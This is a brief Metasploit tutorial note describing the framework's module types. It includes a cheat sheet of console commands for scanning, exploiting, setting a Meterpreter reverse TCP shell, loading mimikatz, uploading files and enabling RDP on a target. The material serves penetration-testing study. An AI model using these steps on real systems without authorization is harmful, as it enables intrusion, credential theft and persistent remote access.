Metasploit 101

# Metasploit 101 ###### tags: `cyber security` `exploitation` `metasploit` ## MSF architecture ![](https://i.imgur.com/QQjFOGF.png) ### Modules **Exploit**: contains the exploit code **Payload**: contains the shell code used after exploit compromises a system **Encoder**: allows us to modify the appearance of our exploit in order to avoid signature detection **NOP**: used with buffer overflow and ROP attacks. A NOP generator produces a series of random bytes that can be used to bypass standard IDS and IPS NOP sled signatures. **Auxiliary**: performs arbitrary actions not directly related to exploitation e.g Scanning, fuzzing, and DOS attacks. Usually used to scan and verify that machines are exploitable. **Post**: used for looting and pivoting. ### How to use ```=1 # initialize postgresql for msf to start faster systemctl start postgresql # init db msfdb init # start msf msfconsole # check db connection db_status # add workspace and call it ham workspace -a ham # switch to workspace ham workspace ham # run an nmap scan of the target, e.g 10.10.3.4 db_nmap -sV -vv 10.10.3.4 # check services found services # check hosts found if you had done a ping sweep nmap -sn hosts # get help e.g on hosts hosts -h # search for module e.g icecast search icecast # use module e.g icecast use icecast # display info for module info # display options for module options # set options e.g lhost set lhost 10.2.3.4 # save console output to a file spool # check discovered vulns vuln # exploit exploit # run as job run -j # view sessions session # set payload e.g a meterpreter reverse tcp shell set payload windows/meterpreter/reverse_tcp # migrate session to a different process migrate # run mimikatz load kiwi # get privileges of users through mimikatz getprivs # transfer files to target upload # check if windows target is vm run post/windows/gather/checkvm # check for exploits run post/multi/recon/local_exploit_suggester # try forcing rdp on target run post/windows/manage/enable_rdp ``` Additional References: https://docs.rapid7.com/metasploit/ https://www.tutorialspoint.com/metasploit/index.htm https://nooblinux.com/metasploit-tutorial/ https://www.metasploit.com/get-started https://www.esecurityplanet.com/products/metasploit-framework-tutorial/